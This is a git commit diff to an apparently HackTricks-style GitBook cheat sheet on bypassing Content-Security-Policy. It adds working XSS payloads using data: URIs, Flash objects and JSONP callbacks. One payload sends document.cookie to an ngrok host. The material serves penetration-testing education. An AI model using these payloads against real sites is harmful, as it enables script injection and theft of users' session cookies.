GitBook: [#3634] No subject
This commit is contained in:
parent
69ae5653b7
commit
542406d1b2
|
@ -128,6 +128,18 @@ Working payload:
|
|||
"/>'><script src=data:text/javascript,alert(1337)></script>
|
||||
```
|
||||
|
||||
### Whitelisted data:
|
||||
|
||||
```yaml
|
||||
Content-Security-Policy: script-src data: ;
|
||||
```
|
||||
|
||||
Working payload:
|
||||
|
||||
```html
|
||||
<script src=data:text/javascript,alert(1337)></script>
|
||||
```
|
||||
|
||||
### Lack of object-src and default-src
|
||||
|
||||
{% hint style="danger" %}
|
||||
|
@ -142,7 +154,7 @@ Working payloads:
|
|||
|
||||
```markup
|
||||
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
|
||||
">'><object type="application/x-shockwave-flash" data='https: //ajax.googleapis.com/ajax/libs/yui/2.8.0 r4/build/charts/assets/charts.swf?allowedDomain=\"})))}catch(e) {alert(1337)}//'>
|
||||
">'><object type="application/x-shockwave-flash" data='https://ajax.googleapis.com/ajax/libs/yui/2.8.0 r4/build/charts/assets/charts.swf?allowedDomain=\"})))}catch(e) {alert(1337)}//'>
|
||||
<param name="AllowScriptAccess" value="always"></object>
|
||||
```
|
||||
|
||||
|
@ -206,9 +218,10 @@ Scenarios like this where `script-src` is set to `self` and a particular domain
|
|||
```markup
|
||||
"><script src="https://www.google.com/complete/search?client=chrome&q=hello&callback=alert#1"></script>
|
||||
"><script src="/api/jsonp?callback=(function(){window.top.location.href=`http://f6a81b32f7f7.ngrok.io/cooookie`%2bdocument.cookie;})();//"></script>
|
||||
"><script src="https://accounts.google.com/o/oauth2/revoke?callback=alert(1)"></script>
|
||||
```
|
||||
|
||||
[JSONBee](https://github.com/zigoo0/JSONBee) contains ready to use JSONP endpoints to CSP bypass of different websites.
|
||||
****[**JSONBee**](https://github.com/zigoo0/JSONBee) **** contains **ready to use JSONP endpoints** to CSP bypass of different websites.
|
||||
|
||||
The same vulnerability will occur if the **trusted endpoint contains an Open Redirect** because if the initial endpoint is trusted, redirects are trusted.
|
||||
|
||||
|
@ -525,6 +538,7 @@ Example: [http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=;\_\&y
|
|||
* [https://lcamtuf.coredump.cx/postxss/](https://lcamtuf.coredump.cx/postxss/)
|
||||
* [https://bhavesh-thakur.medium.com/content-security-policy-csp-bypass-techniques-e3fa475bfe5d](https://bhavesh-thakur.medium.com/content-security-policy-csp-bypass-techniques-e3fa475bfe5d)
|
||||
* [https://0xn3va.gitbook.io/cheat-sheets/web-application/content-security-policy#allowed-data-scheme](https://0xn3va.gitbook.io/cheat-sheets/web-application/content-security-policy#allowed-data-scheme)
|
||||
* [https://www.cobalt.io/blog/csp-and-bypasses](https://www.cobalt.io/blog/csp-and-bypasses)
|
||||
|
||||
|
||||
|
||||
|
|
Loading…
Reference in New Issue